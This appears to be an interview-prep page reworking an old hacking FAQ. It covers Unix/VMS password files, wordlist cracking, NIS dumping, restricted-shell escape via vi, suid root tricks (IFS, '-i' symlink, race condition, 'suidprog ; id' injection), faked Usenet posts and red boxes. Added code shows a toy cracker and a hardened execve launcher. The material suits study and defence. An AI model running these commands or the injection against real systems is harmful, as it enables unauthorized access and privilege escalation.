Hacking Interview Preparation Guide

Hacking is widely treated as a criminal act, but the terms hack and hacking are also used to refer to modifying a program or device to give the user access to features that were otherwise unavailable, such as by circuit bending. It is from this usage that the term hacking came to be applied to more nefarious criminal uses such as identity theft, credit card fraud or other actions categorized as computer crime. Use the questions below to start preparing for a job interview related to hacking.

56 Hacking Questions and Answers:

1 :: How do I access the password file under Unix?

In standard Unix the password file is /etc/passwd. On a Unix system
with either NIS/yp or password shadowing, much of the password data
may be elsewhere: in the NIS passwd map, or in a shadow file such as
/etc/shadow that only root can read.

2 :: How do I crack Unix passwords?

Contrary to popular belief, Unix passwords cannot be decrypted. Unix
passwords are hashed with a one-way function (traditionally the
DES-based crypt(3)). The login program hashes the text you enter at
the "password:" prompt and compares that hashed string against the
stored hash of your password.

Password cracking software uses wordlists. Each word in the wordlist
is hashed with the salt taken from the target entry (traditional
crypt(3) uses a two-character salt, so there are 4096 possible salt
values) and the result is compared to the stored hash. The salt stops
one precomputed table from serving every account; it does not slow
down guessing against a single hash whose salt is known.

The best cracking program for Unix passwords is currently Crack by
Alec Muffett. For PC-DOS, the best package to use is currently
CrackerJack.

3 :: How do I access the password file under VMS?

Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT. However,
unlike Unix, most users do not have access to read the password file.

4 :: How do I crack VMS passwords?

Write a program that uses the SYS$GETUAF functions to compare the
results of encrypted words against the encrypted data in SYSUAF.DAT.

Two such programs are known to exist, CHECK_PASSWORD and
GUESS_PASSWORD.

5 :: What is NIS/yp?

NIS (Network Information Service) is the current name for what was once
known as yp (Yellow Pages). The purpose of NIS is to allow many
machines on a network to share configuration information, including
password data. NIS is not designed to promote system security. If
your system uses NIS you will have a very short /etc/passwd file with
a line that looks like this:

+::0:0:::

The leading "+" tells the C library to fill in the remaining entries
from the NIS passwd map. To view the real password data, dump that map
with this command:

ypcat passwd

Any user on any NIS client can run it, so if the map carries password
hashes, every client user has them.

6 :: What is password shadowing?

Password shadowing is a security system where the encrypted password
field of /etc/passwd is replaced with a special token (such as "x" or
"*") and the encrypted password is stored in a separate file, commonly
/etc/shadow, which is not readable by normal system users.

To defeat password shadowing on many systems, write a program that
uses successive calls to getpwent() to obtain the password file. This
only works where the C library hands the real hash to unprivileged
callers; on current systems getpwent() returns the placeholder token
and the program below simply reproduces /etc/passwd.

Example:

#include <stdio.h>
#include <pwd.h>

int main(void)
{
    struct passwd *p;

    /* walk every entry the C library will return, one per call */
    while ((p = getpwent()) != NULL)
        printf("%s:%s:%u:%u:%s:%s:%s\n", p->pw_name, p->pw_passwd,
               (unsigned)p->pw_uid, (unsigned)p->pw_gid,
               p->pw_gecos, p->pw_dir, p->pw_shell);
    endpwent();
    return 0;
}
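
The following is an added example, not code from the original guide nor from Crack or CrackerJack. It ties questions 2, 5 and 6 together: a wordlist attack of the kind described in question 2, run over passwd-format lines of the kind produced by /etc/passwd, ypcat or getpwent(). crypt(3) itself is replaced by a constructed stand-in ($toy$salt$sha256) so the code runs anywhere, and the sample passwd lines and wordlist are constructed as well. It shows that each guess is hashed and compared rather than anything being decrypted, that the salt comes from the target entry, and that entries carrying only a shadow token or an NIS "+" line give an attacker nothing to work with.

```python
import hashlib

# Constructed stand-in for crypt(3). Real crypt(3) is DES-based with a
# two-character salt; this toy keeps the same shape (one-way, salted, salt
# stored beside the hash): $toy$<salt>$<sha256(salt + password)>.
def toy_crypt(password: str, salt: str) -> str:
    digest = hashlib.sha256((salt + password).encode("utf-8")).hexdigest()
    return f"$toy${salt}${digest}"

# Password-field values that mean "no hash here": shadowing placeholders
# and locked accounts.
SHADOW_TOKENS = {"", "x", "*", "!", "!!"}

def parse_passwd(text: str):
    """Yield (name, pw_field) for each passwd-format line.
    NIS compat lines ('+::0:0:::' and '-' exclusions) are not accounts, so
    they are skipped; the real entries would come from 'ypcat passwd'."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "+-":
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        yield fields[0], fields[1]

def crackable_entries(text: str):
    """Entries whose password field holds a real hash rather than a token."""
    return [(name, pw) for name, pw in parse_passwd(text)
            if pw not in SHADOW_TOKENS]

def crack(entries, wordlist):
    """Dictionary attack: hash each word with the salt of the target entry
    and compare. Entries sharing a salt are grouped so each word is hashed
    once per distinct salt rather than once per account."""
    by_salt = {}
    for name, pw in entries:
        parts = pw.split("$")
        if len(parts) != 4 or parts[1] != "toy":
            continue                      # unknown scheme: cannot test guesses
        by_salt.setdefault(parts[2], {})[name] = pw
    found = {}
    for salt, pending in by_salt.items():
        for word in wordlist:
            if not pending:
                break
            candidate = toy_crypt(word, salt)
            for name in [n for n, h in pending.items() if h == candidate]:
                found[name] = word
                del pending[name]
    return found

# Constructed sample data: a short NIS-style /etc/passwd with one shadowed
# account and the "+" line that points the C library at the NIS map.
SAMPLE_PASSWD = "\n".join([
    "root:" + toy_crypt("toor", "Kz") + ":0:0:root:/root:/bin/sh",
    "alice:" + toy_crypt("sunshine", "Kz") + ":1000:1000:Alice:/home/alice:/bin/sh",
    "bob:" + toy_crypt("Tr0ub4dor&3", "q7") + ":1001:1001:Bob:/home/bob:/bin/sh",
    "carol:x:1002:1002:Carol:/home/carol:/bin/sh",   # hash lives in /etc/shadow
    "+::0:0:::",                                     # NIS: consult the passwd map
])
WORDLIST = ["password", "sunshine", "letmein", "toor", "qwerty"]

if __name__ == "__main__":
    entries = crackable_entries(SAMPLE_PASSWD)
    print("entries with a hash to attack:", [n for n, _ in entries])
    print("cracked:", crack(entries, WORDLIST))
```

Only root and alice fall to the wordlist; bob's passphrase is not in it and carol's hash is not in the file at all, which is the whole point of shadowing.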

7 :: How do I break out of a restricted shell?

On poorly implemented restricted shells you can break out of the
restricted environment by running a program that features a shell
escape. A good example is vi. Run vi and use this command:

:set shell=/bin/sh

then spawn the shell with this command:

:shell

Any program the restricted shell lets you run that can start a
subprocess works the same way (less and more with the "!" command, for
example). A properly locked-down restricted shell only exposes
programs with such escapes disabled, such as vim's restricted mode
(rvim or vim -Z).

8 :: How do I gain root from a suid script or program?

1. Change IFS.

If the suid program is a shell script, or a binary that runs commands
through system() or popen(), you may be able to fool it by changing
IFS. IFS is the Internal Field Separator that the shell uses to
delimit words. If the program contains a line that looks like this:

system("/bin/date")

and you change IFS to '/', an old Bourne shell will interpret the
command text as:

bin date

Now, if you have a program of your own in the path called "bin", the
suid program will run your program instead of /bin/date.
To change IFS in sh, use:

IFS='/'; export IFS

or in csh:

setenv IFS '/'

Modern shells (bash, dash, ksh) apply IFS only to the results of
expansions, not to the literal command text, so "/bin/date" stays one
word and this trick no longer works on them.

2. Link the script to -i

Create a symbolic link named "-i" to the script. When the kernel runs
the script through its #! interpreter it passes the name the script
was invoked by as an argument, so /bin/sh sees "-i" and starts up in
interactive mode instead of running the script. The link has to be
invoked by its bare name (with the current directory in PATH), and
this only works on suid shell scripts.

Example:

% ln -s suid.sh ./-i
% -i
#

3. Exploit a race condition

The kernel opens the script to read its #! line, then the interpreter
opens the script a second time by name. Replace a symbolic link to the
script with a link to your own program in that window, while the
kernel is still loading /bin/sh:

Example:

% ln -s suidprog suidroot
% nice -19 suidroot & ln -sf evilprog suidroot

Items 2 and 3 depend on the kernel honouring the setuid bit on an
interpreted script. Linux ignores setuid on scripts for exactly these
reasons, and bash drops privileges when its effective uid differs from
its real uid unless started with -p.

4. Send bad input to the program.

If the program hands an argument or its input to a shell (system() or
popen()), include a command separator and a separate command of your
own in that input, so the shell runs your command with the suid
program's privileges.

Example:

suidprog ; id
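
The following is an added example (not code from the original guide). It shows in C the mechanism behind items 1 and 4 above and the launcher pattern that defeats both: a tokenizer reproducing how an old Bourne shell split the command text on IFS, the vulnerable system() call into which "alice; id" can be spliced, and a hardened version that validates its argument, executes the program directly with an argv array and gives the child a fixed environment. The finger program path, the lookup function names and the sample argument strings are assumptions made for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Item 1: an old Bourne shell split the text of the command line itself on
 * the characters in IFS. This reproduces that splitting so you can see why
 * IFS='/' turns the literal "/bin/date" into the two words "bin" and "date".
 * Returns the number of words written into words[] (each at most 31 chars). */
int split_on_ifs(const char *cmd, const char *ifs, char words[][32], int max)
{
    int n = 0, len = 0;
    for (const char *p = cmd; ; p++) {
        if (*p == '\0' || strchr(ifs, *p) != NULL) {
            if (len > 0 && n < max)
                words[n++][len] = '\0';
            len = 0;
            if (*p == '\0')
                break;
        } else if (n < max && len < 31) {
            words[n][len++] = *p;
        }
    }
    return n;
}

/* Item 4, the vulnerable pattern: the caller's string is spliced into a
 * command that system() hands to "/bin/sh -c", so an argument such as
 * "alice; id" also runs id, with the suid program's privileges. */
int lookup_vulnerable(const char *user)
{
    char cmd[256];
    snprintf(cmd, sizeof cmd, "/usr/bin/finger %s", user);   /* assumed path */
    return system(cmd);
}

/* Allowlist check for an argument that will become one command-line word:
 * letters, digits, '.', '_' and '-' only, non-empty, and not starting with
 * '-' so the target program cannot parse it as an option. */
int is_safe_argument(const char *s)
{
    if (s == NULL || *s == '\0' || *s == '-')
        return 0;
    for (; *s != '\0'; s++)
        if (!isalnum((unsigned char)*s) && *s != '.' && *s != '_' && *s != '-')
            return 0;
    return 1;
}

/* The hardened launcher: no shell is involved (execve with an argv array),
 * the child gets a fixed environment so IFS and PATH cannot come from the
 * caller, and the argument is validated first. Returns the program's exit
 * status, -1 if the argument is rejected or the child cannot be started,
 * 127 if the program could not be executed. */
int lookup_safe(const char *prog, const char *user)
{
    if (!is_safe_argument(user))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)prog, (char *)user, NULL };
        char *const envp[] = { "PATH=/usr/bin:/bin", "IFS= \t\n", NULL };
        execve(prog, argv, envp);
        _exit(127);                 /* only reached if execve failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char words[4][32];
    int n = split_on_ifs("/bin/date", "/", words, 4);
    printf("IFS='/' splits \"/bin/date\" into %d words: %s %s\n",
           n, words[0], words[1]);
    printf("\"alice; id\" accepted as an argument? %d\n",
           is_safe_argument("alice; id"));
    printf("lookup_safe with a missing program -> %d\n",
           lookup_safe("/nonexistent/finger", "alice"));
    return 0;
}
```

lookup_vulnerable is there only for comparison; nothing in the program calls it. The fixed envp is the defence against item 1 and the argv array against item 4: with no shell between the suid program and the target, neither IFS nor a ";" in the input is ever interpreted.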

9 :: How do I fake posts to UseNet?

Use inews to post. Give inews the following lines:
From:
Newsgroups:
Subject:
Message-ID:
Date:
Organization:
For a moderated newsgroup, inews will also require this line:
Approved:
Then add your post and terminate with <Control-D>.
Example:
From: Dale Drew
Newsgroups: alt.2600
Subject: Please forgive me
Message-ID: <d_drew.123@tymnet.com>
Date: Fri, 13 Jun 1994 12:15:03
Organization: Tymnet Insecurity

Note that every server an article passes through prepends its own name
to the Path: header, and many injecting servers add an
NNTP-Posting-Host: header, so a faked From: line does not hide where
the post actually entered the network.

10 :: What is a Red Box?

When a coin is inserted into a payphone, the phone emits a set of
tones. A red box is a device that simulates those tones, with the
purpose of fooling the payphone into believing you have inserted an
actual coin.